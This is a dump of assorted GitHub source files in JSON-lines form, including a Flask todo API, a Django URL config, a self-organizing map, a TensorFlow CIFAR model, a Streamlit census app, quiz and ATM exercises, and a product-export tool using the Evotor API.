manifest_by_split[\"tgt_text\"].append(space_normalized_tgt_utt)\n manifest_by_split[\"speaker\"].append(samples[j][\"speaker\"])\n\n save_df_to_tsv(\n pd.DataFrame.from_dict(manifest_by_split),\n args.output_file\n )\n\n\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-file\", required=True, type=str)\n parser.add_argument(\"--output-file\",required=True, type=str)\n\n\n args = parser.parse_args()\n\n process(args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fengpeng-yue/speech-to-speech-translation","sub_path":"examples/s2s_trans/preprocessing/g2p.py","file_name":"g2p.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"2975661257","text":"import codecs\n\ndef loadStudents():\n checkFile()\n for line in codecs.open('studenti.txt', 'r',encoding='utf8').readlines():\n if len(line) > 1:\n stud = str2student(line)\n studenti.append(stud)\n\ndef checkFile():\n if not exists('studenti.txt'):\n codecs.open('studenti.txt', 'w',encoding='utf8').close()\n\ndef saveStudents():\n file = codecs.open('studenti.txt', 'w',encoding='utf8')\n for stud in studenti:\n file.write(student2str(stud))\n file.write('\\n')\n file.close()\n\ndef str2student(line):\n if line[-1] == '\\n':\n line = line[:-1]\n\t# line = line.strip() \n indeks, ime, prezime, roditelj, datum, jmbg, adresa, telefon, email, godina = line.split('|')\n stud = {\n 'indeks': indeks,\n 'ime': ime,\n 'prezime': prezime,\n 'roditelj': roditelj,\n 'datum': datum,\n 'jmbg': jmbg,\n 'adresa': adresa,\n 'telefon': telefon,\n 'email': email,\n 'godina': godina\n }\n return stud\n\ndef student2str(stud):\n return '|'.join([stud['indeks'], stud['ime'], stud['prezime'], \n stud['roditelj'], stud['datum'], stud['jmbg'], stud['adresa'], \n stud['telefon'], stud['email'], stud['godina']])\n","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/09 Referentni projekat[2018-19]/Primeri/stuenti_primeri.py","file_name":"stuenti_primeri.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33262317338","text":"# REST API\nfrom django.urls import path, include\n# connects routes to views (controllers) - when i get a request here, execute views\nfrom . import views\n\nurlpatterns = [\n# CHANGED the url for react\n path('pets/', views.PostList.as_view(), name='post_list'), # api/contacts will be routed to the ContactList view for handling\n path('pets//', views.PostDetail.as_view(), name='post_detail'), # api/contacts will be routed to the ContactDetail view for handling\n path('users/', views.UserViewSet.as_view(), name='user_detail'),\n] #","repo_name":"kathleendiep/pet-ventures-api","sub_path":"posts_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35985014294","text":"import random\r\n\r\n\r\n# idea: takes question and answer from an input file, randomly selects one pair\r\n# and puts into a tuple\r\nclass Qanda: # class for questions and answers\r\n string1 = \"qanda created\"\r\n qlist = []\r\n alist = []\r\n score = 0\r\n\r\n def __init__(self):\r\n # when a new object is defined, creates a question and answer stored into 2 lists, along with dummy answers\r\n with open(\"q&a\") as file: #open and read q&a file\r\n counter = 1\r\n for line in file:\r\n if line == \"\":\r\n break\r\n elif counter % 2 == 0: # start at line 1. If line is odd, it is a question. If even, it is an answer\r\n self.alist.append(line)\r\n counter += 1\r\n else:\r\n self.qlist.append(line)\r\n counter += 1\r\n\r\n def printQuestions(self):\r\n for x in self.qlist:\r\n print(x)\r\n\r\n def printAnswers(self):\r\n for x in self.alist:\r\n print(x)\r\n\r\n def runGame(self, questions):\r\n counter = questions\r\n used = [] # a list of questions that were already used\r\n while counter > 0:\r\n validQuestion = True\r\n randNum = random.randint(0, (len(self.qlist) - 1)) #random number is between 0 and length of list\r\n exist_count = used.count(randNum) # check to see if the question has been used\r\n if exist_count > 0: #if the number is found in the used list\r\n randNum = random.randint(0, (len(self.qlist) - 1)) # generate a new random number\r\n validQuestion = False\r\n exist_count = 0 #reset exist number counter\r\n\r\n if validQuestion:\r\n print(\"Question: \" + self.qlist[randNum])\r\n answers = self.alist[randNum]\r\n answers = answers.split(\",\") #split answers up into an answer list\r\n a = answers[0] # first index is the right answer\r\n b = answers[1]\r\n c = answers[2]\r\n d = answers[3]\r\n print(\"A. \"+a)\r\n print(\"B. \"+b)\r\n print(\"C. \"+c)\r\n print(\"D. \"+d)\r\n userAnswer = input(\"Answer: \")\r\n if userAnswer.upper() == \"A\": #as of right now, A is the only correct answer\r\n self.score += 1\r\n print(\"Correct!\")\r\n else:\r\n print(\"Wrong!\")\r\n\r\n used.append(randNum)\r\n counter -= 1\r\n \r\n print('\\n', \"Your Final score is: \", self.score, '\\n') \r\n return self.score\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"ChristianC343/triviaGroup","sub_path":"qanda.py","file_name":"qanda.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"41862750442","text":"from django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.staticfiles.urls import static\nfrom rest_framework.routers import SimpleRouter\n\nfrom backweb import views\nfrom ooohblog.settings import MEDIA_URL, MEDIA_ROOT\n\nrouter = SimpleRouter()\n\n\n\nurlpatterns = [\n url(r'^login/', views.user_login, name='login'),\n url(r'^register/', views.register, name='register'),\n url(r'^my_index/', views.my_index, name='my_index'),\n url(r'^article/', views.article, name='article'),\n url(r'^add_article/', views.add_article, name='add_article'),\n url(r'^article_list/', views.article_list, name='article_list'),\n url(r'^logout/', auth_views.logout, name='user_logout'),\n url(r'^del_article/(\\d+)/',views.del_article,name='del_article'),\n url(r'^edit_article/(?P\\d+)/',views.edit_article,name='edit_article'),\n]\n\nurlpatterns += router.urls\nurlpatterns += static(MEDIA_URL, document_root=MEDIA_ROOT)","repo_name":"crazy-sugar/ooohblog","sub_path":"backweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29354632469","text":"#Ordenar tres números\nVal_1 = int(input(\"Ingrese Primer Valor : \"))\nVal_2 = int(input(\"Ingrese Segundo Valor : \"))\nVal_3 = int(input(\"Ingrese Tercer Valor : \"))\n\n\n\n#Rescata Valor Minimo\nVal_Min = min(Val_1,Val_2,Val_3)\n\n\n\n#Rescata Valor Maximo\nVal_Max = max(Val_1,Val_2,Val_3)\n\n\n\n#Rescata Valor Intermedio\nVal_Inter = (Val_1 + Val_2 + Val_3)-Val_Max-Val_Min\n\n\n\nprint(\"Los Numeros ordenados son : \", format(Val_Min)+ \",\", format(Val_Inter)+\",\", format(Val_Max)) ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej6/hito1_ej6_bdb8c16d59c7f3f983601a90352624a6.py","file_name":"hito1_ej6_bdb8c16d59c7f3f983601a90352624a6.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7036770392","text":"from flask import Flask, jsonify, send_from_directory, request\n\n'''\npython3 -m venv env\n\npip install -r requarenments.txt\npip freeze > requarenments.txt\n'''\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\ndef create_generator_id(id=0):\n while True:\n yield id\n id += 1\n\ngenerator_id = create_generator_id(3)\n \n\ntodoList = [\n {\n \"id\": 1,\n \"task\": \"Make a what todo\",\n \"done\": False\n },\n {\n \"id\": 2,\n \"task\": \"Read todo list\",\n \"done\": True\n }\n]\n\n@app.route('/')\ndef index():\n return send_from_directory('client/public', 'index.html')\n\n\n@app.route('/')\ndef home(path):\n return send_from_directory('client/public', path)\n\n\n@app.route('/todo/', methods=['GET'])\ndef get_todo_list():\n return jsonify(todoList)\n\n\n@app.route('/todo/', methods=['POST'])\ndef create_todo_item():\n data = request.get_json()\n task = {\n 'task': data['task'],\n 'done': False,\n 'id': next(generator_id)\n }\n todoList.append(task)\n return jsonify(task)\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=8000, debug=True)\n","repo_name":"fallGamlet/iti_net_tech_cource","sub_path":"flask-app-api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6867426782","text":"import numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nclass SOM(object):\n def __init__(self,h,w,dim_feat):\n \n self.shape = (h,w,dim_feat)\n self.som = np.zeros((h,w,dim_feat))\n self.L0 = 0.0\n self.lam = 0.0\n self.sigma0 = 0.0\n \n def train(self,data,L0,lam,sigma0,initializer=np.random.rand):\n \n self.L0 = L0\n self.lam = lam\n self.sigma0 = sigma0\n \n self.som = initializer(*self.shape)\n self.data = data\n \n for t in itertools.count():\n \n if self.sigma(t) < 1.0:\n break\n \n i_data = np.random.choice(range(len(data)))\n bmu = self.find_bmu(data[i_data])\n self.update_som(bmu,data[i_data],t)\n \n def update_som(self,bmu,input_vector,t):\n for y in range(self.shape[0]):\n for x in range(self.shape[1]):\n dist_to_bmu = np.linalg.norm((np.array(bmu) - np.array((y,x))))\n self.update_cell((y,x),dist_to_bmu,input_vector,t)\n \n def update_cell(self,cell,dist_to_bmu,input_vector,t):\n \n self.som[cell] += self.N(dist_to_bmu,t)*self.L(t)*(input_vector-self.som[cell])\n \n def N(self,dist_to_bmu,t):\n curr_sigma = self.sigma(t)\n return np.exp(-(dist_to_bmu**2)/(2*curr_sigma**2))\n \n def sigma(self,t):\n return self.sigma0*np.exp(-t/self.lam)\n \n \n def find_bmu(self,input_vec):\n list_bmu = []\n for y in range(self.shape[0]):\n for x in range(self.shape[1]):\n dist = np.linalg.norm((input_vec - self.som[y,x]))\n list_bmu.append(((y,x),dist))\n list_bmu.sort(key = lambda x: x[1])\n \n return list_bmu[0][0]\n \n def update_bmu(self,bmu,input_vector,t):\n self.som[bmu] += self.L(t)*(input_vector-self[bmu])\n \n def L(self,t):\n return self.L0*np.exp(-t/self.lam)\n \n def quant_err(self):\n \"\"\" \n Computes the quantization error of the SOM.\n It uses the data fed at last training.\n \"\"\"\n bmu_dists = []\n for input_vector in self.data:\n bmu = self.find_bmu(input_vector)\n bmu_feat = self.som[bmu]\n bmu_dists.append(np.linalg.norm(input_vector-bmu_feat))\n return np.array(bmu_dists).mean()\n \n def plot_data(self):\n for _ in range(3):\n i_data = np.random.choice(range(len(self.data)))\n plt.imshow(self.data[i_data], interpolation='nearest')\n plt.show()\n \n def plot_som(self):\n plt.imshow(self.som, interpolation='nearest')\n plt.show()\n\ndef main():\n \"\"\" square_data = np.random.rand(5000,2)\n som_square = SOM(20,20,2)\n frames_square = []\n som_square.train(square_data,L0=0.8,lam=1e2,sigma0=10)\n print(\"quantization error:\", som_square.quant_err())\"\"\"\n \n img=mpimg.imread('NaveeCP.jpg')\n \n color_data = np.reshape(img,(26838,3))\n \n som_color = SOM(189, 142, 3)\n som_color.train(color_data,L0=0.8,lam=1e2,sigma0=20)\n print(\"quantization error:\", som_color.quant_err())\n som_color.plot_data()\n som_color.plot_som()\n \n \n\nif __name__ == '__main__':\n main()\n ","repo_name":"NaveenPoornachandra/ML_AI","sub_path":"SelfOrganizingMap.py","file_name":"SelfOrganizingMap.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34296046681","text":"import sys\nimport json\nimport os.path\nimport logging\nimport constants\nimport settings\nimport saverResolver\nimport loaders\nfrom PyQt5 import uic, QtWidgets, QtCore\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow, QDialog\nimport datetime\nimport requests\n\n\nclass LogHandler(logging.Handler):\n def __init__(self, func, level=logging.NOTSET):\n logging.Handler.__init__(self, level)\n self.func = func\n\n def handle(self, record):\n logging.Handler.handle\n self.func(self.format(record))\n\n\nclass ConvertService(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi('mainwindow.ui', self)\n self.settings_open_button.clicked.connect(self.show_settings)\n self.version = '1.01'\n self.initUI()\n fileName = \"settings.json\"\n self.appSettings = {}\n if (os.path.exists(fileName)):\n with open(fileName, \"r\") as read_file:\n self.appSettings = json.load(read_file)\n\n self.start_button.clicked.connect(self.save_xml)\n self.settingsWindow = settings.Settings(self.appSettings)\n self.test_button.clicked.connect(self.test)\n self.delete_button.clicked.connect(self.delete_all)\n\n FORMAT = '%(asctime)-15s %(message)s'\n logging.basicConfig(\n format=FORMAT, filename=\"convertService.log\", level=\"DEBUG\")\n baseLogger = logging.getLogger('convertService')\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n baseLogger.addHandler(handler)\n logHandler = LogHandler(self.add_line)\n logHandler.setFormatter(formatter)\n baseLogger.addHandler(logHandler)\n self.logger = baseLogger\n self.logger.debug('Init')\n \n def initUI(self):\n self.setWindowTitle('Convert service ' + self.version)\n\n def add_line(self, msg):\n item = QtWidgets.QListWidgetItem()\n item.setText(msg)\n self.logView.addItem(item)\n\n def delete_all(self):\n self.logger.debug(\"Evotor api clear all data...\")\n\n self.headers = {'Content-type': 'application/json', 'x-authorization': self.appSettings[constants.apiKey]}\n StoreUuid = self.get_store_uuid()\n self.logger.debug(\"Got store uuid:\"+StoreUuid)\n url = \"https://api.evotor.ru/api/v1/inventories/stores/\"+StoreUuid+\"/products/delete\"\n\n requestResult = requests.post(url, data=\"[]\", headers=self.headers)\n self.logger.debug(requestResult)\n \n def get_store_uuid(self):\n url = 'https://api.evotor.ru/api/v1/inventories/stores/search'\n response = requests.get(url, headers = self.headers)\n StoreUuid = response.json()[0]['uuid']\n return StoreUuid\n\n def test(self):\n self.logger.debug(\"Evotor api test...\")\n\n self.headers = {'Accept': 'application/vnd.evotor.v2+json',\n 'Content-type': 'application/vnd.evotor.v2+json', 'x-authorization': self.appSettings[constants.apiKey] \n }\n StoreUuid = self.get_store_uuid()\n self.logger.debug(\"Got store uuid:\"+StoreUuid)\n url = \"https://api.evotor.ru/api/v1/inventories/stores/\"+StoreUuid+\"/products\"\n\n requestResult = requests.get(url, headers=self.headers)\n self.logger.debug(requestResult.text)\n\n def show_settings(self):\n self.settingsWindow.refresh(self.appSettings)\n result = self.settingsWindow.exec()\n if (result):\n self.save_settings()\n \n \n def testClose(self, events):\n self.logger.debug('close')\n\n def save_xml(self):\n self.logger.debug('Export started')\n\n try:\n dataLoader = loaders.LoaderResolver(self.appSettings, self.logger).GetLoader()\n model = dataLoader.Load()\n saver = saverResolver.SaverResolver(self.appSettings, model, self.logger).GetSaver()\n saver.save()\n self.appSettings[constants.lastExportTime] = str(datetime.datetime.now())\n self.save_settings()\n self.logger.debug('Export finished')\n except Exception as e:\n self.logger.error('%s' % e) \n\n \n def save_settings(self):\n with open(\"settings.json\", \"w\") as read_file:\n json.dump(self.appSettings, read_file)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = ConvertService()\n ex.show()\n sys.exit(app.exec())\n","repo_name":"sail004/convertService","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27862413","text":"\"\"\"\r\n 将正整数排成等边三角形(也叫数塔),三角形的底边有个数,\r\n 下图给出了的一个例子。从三角形顶点出发通过一系列相邻整数(在图中用正方形表示),\r\n 如何使得到达底边时的总和最大\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\"\"\"\r\n https://www.jianshu.com/p/2a7f5cac0d58\r\n\"\"\"\r\n\"\"\"\r\n 动态规划\r\n dp[i][j] = max(dp[i+1][j],dp[i+1][j+1])+date[i][j]\r\n\"\"\"\r\n\r\n\"\"\"\r\n (1) 初始化距离数组dp,令距离dp的最后一行复制树塔的最后一行的值\r\n (2) 从树塔倒数第二行开始,自底向上计算\r\n (3) 判断x点的左右孩子的大小,对应的距离dp = 左右孩子中的较大值加上树塔对应位置值\r\n (4) 重复2、3步骤,直到计算完树塔顶端\r\n\"\"\"\r\n\r\nclass TreePagoda(object):\r\n def __init__(self, pagoda):\r\n self.pagoda = np.array(pagoda)\r\n\r\n # 初始化节点到树塔底的距离\r\n dp = self.pagoda.copy()\r\n dp[:-1, :] = 0\r\n self.dp = dp\r\n # 下一坐标\r\n self.next = dict()\r\n\r\n def run(self):\r\n\r\n index = len(self.pagoda) - 1\r\n for j, value in enumerate(self.pagoda[-1]):\r\n yield self.getIndex(index, j), 0, value\r\n for i in range(len(self.pagoda) - 2, -1, -1): # 自底向上求得最优值\r\n layer = self.pagoda[i]\r\n for j in range(len(layer)):\r\n if layer[j] == 0:\r\n break\r\n self.find(i, j)\r\n yield self.getIndex(i, j), self.getIndex(*self.next[(i, j)]), self.dp[i, j]\r\n\r\n def getIndex(self, i, j):\r\n return int(i * (i + 1) / 2 + j)\r\n\r\n def find(self, i, j):\r\n if self.dp[i + 1, j] > self.dp[i + 1, j + 1]:\r\n self.dp[i, j] = self.dp[i + 1, j] + self.pagoda[i, j]\r\n self.next[(i, j)] = (i + 1, j)\r\n else:\r\n self.dp[i, j] = self.dp[i + 1, j + 1] + self.pagoda[i, j]\r\n self.next[(i, j)] = (i + 1, j + 1)\r\n\r\n def createdPath(self):\r\n cu = (0, 0)\r\n yield self.getIndex(*cu)\r\n while True:\r\n cu = self.next[cu]\r\n yield self.getIndex(*cu)\r\n if cu[0] == len(self.pagoda) - 1:\r\n break\r\n\r\n\r\ndef Test():\r\n treePagoda = np.array(((9, 0, 0, 0, 0),\r\n (12, 15, 0, 0, 0),\r\n (10, 6, 8, 0, 0),\r\n (2, 18, 9, 5, 0),\r\n (19, 7, 10, 4, 16)))\r\n t = TreePagoda(treePagoda)\r\n y = t.run()\r\n for i in range(15):\r\n x = next(y)\r\n print(x)\r\n t.createdPath()\r\n print(t.dp)\r\n for i in t.createdPath():\r\n print(i)\r\n\r\n\r\nif __name__ == '__main__':\r\n Test()\r\n","repo_name":"Curious-chen/curriculum-design","sub_path":"algorithm/TopicB2/TreePagoda.py","file_name":"TreePagoda.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71195617848","text":"import tensorflow as tf\n\n\ndef _conv(x,kernel, name, log=False):\n with tf.variable_scope(name):\n W = tf.get_variable(initializer=tf.truncated_normal(shape=kernel, stddev=0.01), name='W')\n b = tf.get_variable(initializer=tf.constant(0.0, shape=[kernel[3]]), name='b')\n conv = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n activation = tf.nn.relu(tf.add(conv,b))\n pool = tf.nn.max_pool(activation, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n if log == True:\n tf.summary.histogram(\"weights\", W)\n tf.summary.histogram(\"biases\", b)\n tf.summary.histogram(\"activations\", activation)\n return pool\n\n\ndef _dense(x,size_in,size_out,name,relu=False,log=False):\n with tf.variable_scope(name):\n flat = tf.reshape(x, [-1, size_in])\n W = tf.get_variable(initializer=tf.truncated_normal([size_in,size_out], stddev=0.1), name='W')\n b = tf.get_variable(initializer=tf.constant(0.0, shape=[size_out]), name='b')\n activation = tf.add(tf.matmul(flat, W), b)\n if relu==True:\n activation = tf.nn.relu(activation)\n if log==True:\n tf.summary.histogram(\"weights\", W)\n tf.summary.histogram(\"biases\", b)\n tf.summary.histogram(\"activations\", activation)\n return activation\n \n\ndef _model(features, mode, params):\n input_layer = tf.reshape(features, [-1, 32, 32, 3])\n conv1 = _conv(input_layer, kernel=[5,5,3,128], name='conv1', log=params['log'])\n conv2 = _conv(conv1, kernel=[5,5,128,128], name='conv2', log=params['log'])\n conv3 = _conv(conv2, kernel=[3,3,128,256], name='conv3', log=params['log'])\n conv4 = _conv(conv3, kernel=[3,3,256,512], name='conv4', log=params['log'])\n dense = _dense(conv4, size_in=2*2*512, size_out=params['dense_units'],\n name='Dense', relu=True, log=params['log'])\n \n if mode==tf.estimator.ModeKeys.TRAIN:\n dense = tf.nn.dropout(dense, params['drop_out'])\n \n logits = _dense(dense, size_in=params['dense_units'],\n size_out=10, name='Output', relu=False, log=params['log'])\n return logits\n\n\ndef model_fn(features, labels, mode, params):\n logits = _model(features, mode, params)\n predictions = {\"logits\": logits,\n \"classes\": tf.argmax(input=logits,axis=1),\n \"probabilities\": tf.nn.softmax(logits,name='softmax')}\n export_outputs = {'predictions': tf.estimator.export.PredictOutput(predictions)}\n \n if (mode==tf.estimator.ModeKeys.TRAIN or mode==tf.estimator.ModeKeys.EVAL):\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels,logits=logits)\n \n if mode == tf.estimator.ModeKeys.TRAIN:\n learning_rate = tf.train.exponential_decay(params['learning_rate'],\n tf.train.get_global_step(),\n decay_steps=100000,\n decay_rate=0.96)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())\n tf.summary.scalar('learning_rate', learning_rate)\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n \n if mode == tf.estimator.ModeKeys.EVAL:\n accuracy = tf.metrics.accuracy(\n labels=labels, predictions=tf.argmax(logits, axis=1))\n metrics = {'accuracy':accuracy}\n return tf.estimator.EstimatorSpec(mode=mode,loss=loss, eval_metric_ops=metrics)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(\n mode=mode, predictions=predictions, export_outputs=export_outputs)\n","repo_name":"GoogleCloudPlatform/tf-estimator-tutorials","sub_path":"Experimental/distribution/multi-gpu/cmle/project/trainer/sample_model.py","file_name":"sample_model.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"77"} +{"seq_id":"46367047773","text":"\"\"\"\nTask\nCho 1 so N, print ra cac gia tri i^2 voi i chay 0 den N\n\nInput Format\n\nN\n\nConstraints\n1<=N<=20\n\nOutput Format\n\nPrint N dong, moi dong la cac gia tri i^2\n\nSample Input 0\n\n5\nSample Output 0\n\n0\n1\n4\n9\n16\n\"\"\"\n\nif __name__ == '__main__':\n n = int(input())","repo_name":"Qspace/PyOpenCVCourse","sub_path":"Code/Chapter01_BasicPython/EX_Loop.py","file_name":"EX_Loop.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"9672623275","text":"def main():\n str1 = \"devcatoocco\"\n str2 = \"qacatoc\"\n print(findMaxSubArrLen(str1, str2))\n\ndef findMaxSubArrLen(str1, str2):\n m = len(str1)\n n = len(str2)\n dp = [[0 for x in range(n)] for y in range(m)]\n\n maxlen = 0\n maxI = 0\n for i in range(m):\n for j in range(n):\n if str1[i] == str2[j]:\n if i == 0 or j == 0:\n dp[i][j] = 1\n else:\n dp[i][j] = 1 + dp[i-1][j-1]\n if maxlen < dp[i][j]:\n maxI = i\n maxlen = dp[i][j]\n\n return(str1[maxI - maxlen + 1:maxI + 1])\n\nmain()\n","repo_name":"bensenberner/ctci","sub_path":"findMaxSubArr.py","file_name":"findMaxSubArr.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25334214958","text":"# Import modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport streamlit as st\r\n\r\n@st.cache()\r\ndef load_data():\r\n\t# Load the Adult Income dataset into DataFrame.\r\n\r\n\tdf = pd.read_csv('https://student-datasets-bucket.s3.ap-south-1.amazonaws.com/whitehat-ds-datasets/adult.csv', header=None)\r\n\tdf.head()\r\n\r\n\t# Rename the column names in the DataFrame using the list given above. \r\n\r\n\t# Create the list\r\n\tcolumn_name =['age', 'workclass', 'fnlwgt', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income']\r\n\r\n\t# Rename the columns using 'rename()'\r\n\tfor i in range(df.shape[1]):\r\n\t df.rename(columns={i:column_name[i]},inplace=True)\r\n\r\n\t# Print the first five rows of the DataFrame\r\n\tdf.head()\r\n\r\n\t# Replace the invalid values ' ?' with 'np.nan'.\r\n\r\n\tdf['native-country'] = df['native-country'].replace(' ?',np.nan)\r\n\tdf['workclass'] = df['workclass'].replace(' ?',np.nan)\r\n\tdf['occupation'] = df['occupation'].replace(' ?',np.nan)\r\n\r\n\t# Delete the rows with invalid values and the column not required \r\n\r\n\t# Delete the rows with the 'dropna()' function\r\n\tdf.dropna(inplace=True)\r\n\r\n\t# Delete the column with the 'drop()' function\r\n\tdf.drop(columns='fnlwgt',axis=1,inplace=True)\r\n\r\n\treturn df\r\n\r\ncensus_df = load_data()\r\n\r\n# Write your code to filter streamlit warnings \r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n# Configure your home page.\r\n# Set the title to the home page contents.\r\nst.title(\"Census Visualisation App\")\r\n# Provide a brief description for the web app.\r\nst.text('''This web app allows user to explore and visualise census data.''')\r\n\r\n# View Dataset Configuration\r\nst.header(\"View Data\")\r\n# Add an expander and display the dataset as a static table within the expander.\r\n\r\nst.expander(\"View Dataset\")\r\n# Create three beta_columns.\r\nst.subheader(\"Column's Description\")\r\ncol1 , col2 , col3= st.columns(3)\r\n# Add a checkbox in the first column. Display the column names of 'census_df' on the click of checkbox.\r\nwith col1 :\r\n if st.checkbox(\"Show all column names\"):\r\n st.table(list(census_df.columns))\r\n# Add a checkbox in the second column. Display the column data-types of 'census_df' on the click of checkbox.\r\ndf = pd.DataFrame({'Column Data-Type': census_df.dtypes})\r\nwith col2:\r\n\tif st.checkbox(\"View column data-types\"):\r\n\t\tst.dataframe(df)\r\n\r\n# Add a checkbox in the third column followed by a selectbox which accepts the column name whose data needs to be displayed.\r\nwith col3:\r\n if st.checkbox(\"View column data\"):\r\n columns_data = st.selectbox(\"Select_columns\" , ('age', 'workclass', 'fnlwgt', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income'))\r\n if columns_data == \"age\":\r\n st.write(census_df[\"age\"]) \r\n\r\n elif columns_data == \"workclass\":\r\n st.write(census_df[\"workclass\"])\r\n\r\n elif columns_data == \"fnlwgt\":\r\n st.write(census_df[\"fnlwgt\"])\r\n\r\n elif columns_data == \"education\":\r\n st.write(census_df[\"education\"])\r\n\r\n elif columns_data == \"education-years\":\r\n st.write(census_df[\"education-years\"])\r\n\r\n elif columns_data == \"marital-status\":\r\n st.write(census_df[\"marital-status\"])\r\n\r\n elif columns_data == \"occupation\":\r\n st.write(census_df[\"occupation\"])\r\n\r\n elif columns_data == \"relationship\":\r\n st.write(census_df[\"relationship\"])\r\n\r\n elif columns_data == \"race\":\r\n st.write(census_df[\"race\"])\r\n\r\n elif columns_data == \"gender\":\r\n st.write(census_df[\"gender\"])\r\n\r\n elif columns_data == \"capital-gain\":\r\n st.write(census_df[\"capital-gain\"])\r\n\r\n elif columns_data == \"capital-loss\":\r\n st.write(census_df[\"capital-loss\"])\r\n\r\n elif columns_data == \"hours-per-week\":\r\n st.write(census_df[\"hours-per-week\"]) \r\n\r\n elif columns_data == \"native-country\":\r\n st.write(census_df[\"native-country\"]) \r\n\r\n else:\r\n st.write(cars_df['income'])\r\n# Display summary of the dataset on the click of checkbox.\r\n","repo_name":"AnkitDogra-07/multi_page","sub_path":"census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17905454420","text":"lst = [1, 3, 5]\n#lst = [6]\n#lst = []\nsum = 0\nif len(lst):\n for i in range(0, len(lst), 2):\n sum += lst[i]\n print(sum * lst[-1])\nelse:\n print(0)","repo_name":"YuriOleshko/MyHomework","sub_path":"Homework/Homework8.py","file_name":"Homework8.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29302702019","text":"def cajero():\n saldo_cuenta = 100000\n saldo_cajero = 1000000\n intentos = 0\n\n while True:\n usuario = input(\"Ingrese el usuario: \")\n clave = input(\"Ingrese la clave: \")\n\n if usuario == \"10334151\" and clave == \"1803\":\n saldo_disponible = saldo_cuenta\n intentos = 0\n\n while True:\n monto = float(input(\"Ingrese el monto a retirar: \"))\n\n if monto > saldo_disponible:\n print(\"Monto no permitido. El saldo disponible es:\", saldo_disponible)\n else:\n saldo_cuenta -= monto\n saldo_cajero -= monto\n print(\"Retiro exitoso.\")\n print(\"Saldo cuenta:\", saldo_cuenta)\n print(\"Saldo cajero:\", saldo_cajero)\n\n continuar = input(\"¿Desea realizar otro retiro? (S/N): \")\n\n if continuar.upper() != \"S\":\n break\n\n else:\n intentos += 1\n print(\"Clave inválida.\")\n if intentos == 3:\n print(\"Tarjeta bloqueada.\")\n 